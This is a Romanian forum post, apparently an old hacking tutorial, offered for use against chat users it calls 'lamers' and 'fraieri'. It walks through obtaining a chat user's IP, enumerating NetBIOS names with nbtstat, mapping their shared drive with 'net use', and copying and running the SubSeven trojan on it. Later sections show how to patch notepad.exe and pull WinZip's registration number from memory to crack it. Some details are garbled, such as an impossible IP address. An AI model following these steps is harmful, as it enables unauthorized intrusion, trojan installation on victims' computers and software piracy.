Jump to content
zbeng

interesant

Recommended Posts

Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.

Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver.

Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.

Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar

c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul

persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.

Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii.

(rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.)

Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network"

care se gaseste in "control panel" activata.

Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.

Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu

programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi:

c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului}

Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numele

este nebunu(nu,nu incercati la mine,eu nu intru pe chat-uri -:)

Tastati "c:/windows/net use f:IPnebunu" si aveti acces la discul f al fraierului!.

Sa explicam aceasta comanda:

Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95.

IP-adresa lui de ip.

f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces.

nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP"

Sa instalam acum un troian cum ar fi Subseven pe calculatorul lamerului.

Dupa ce dati comanda "c:/windows/net use f:IPnebunu" copiati fisieul "server.exe" pe f:

"copy server.exe f:" apoi il executati "f:/server.exe".

DISTRACTIE PLACUTA

Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti crea

un disc virtual x: pe care sa puneti troianul.

"net use x:IPtmpparola_dorita/user:ntwak0

"net copy server.exe"

C-R-A-C-K-I-N-G ----------------------- N-O-T-E-P-A-D

Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare

mesajul "the file is too large for notepad to open......."????.Haideti sa scapam de acest mesaj

si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.

1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew

2) cunostinte minime de assembler

-dezasamblati programul in w32dasm

-activati optiunea "string reference" si cautati sirul "the file is too large..."

-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import

-cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)

-dati dublu click pe ea si obtineti ceva de genul

call dword ptr [00407430] {chemarea procedurii de mesaj}

cmp eax,0000006{compara registrul eax cu adresa procedurii}

jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni

la selectarea lui OK se deschide Wordpad iar altfel iese.

Celelalte instructiuni nu mai conteza

- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset

-inchideti w32dasm

-deschideti Hiew "hiew notepad.exe"

-selectati F4 optiunea decode

-F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)}

-F3 scrieti 404840484048

-F9 pentru a valida introducerea

-F5,scrieti numarul pentru jne care este 216A

-F3,scrieti 404840484048

-F9 pentru a actualiza si Gata!!!

Ce dracu' este 404840484048?

40-in hexazecimal inseamna "inc eax" adica adauga 1

48-inseamna "dec eax" adica scade 1

90 inseamna NOP adica instructiunea nula(nu face nimic)

Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune

asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1).

C-R-A-C-K-I-N-G W-I-N-Z-I-P

-deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669

-NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie

-scanez in programul dezasamblat 66696669 in hexa

-ma duc la adresa indicata cum ar fi 00154:FA14569

-gasesc ceva de genul:

mov al,[edx]

cmp al,[esi]

jnz 00418956

Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in memorie

in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!

tutorial facut de vrajitorul

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...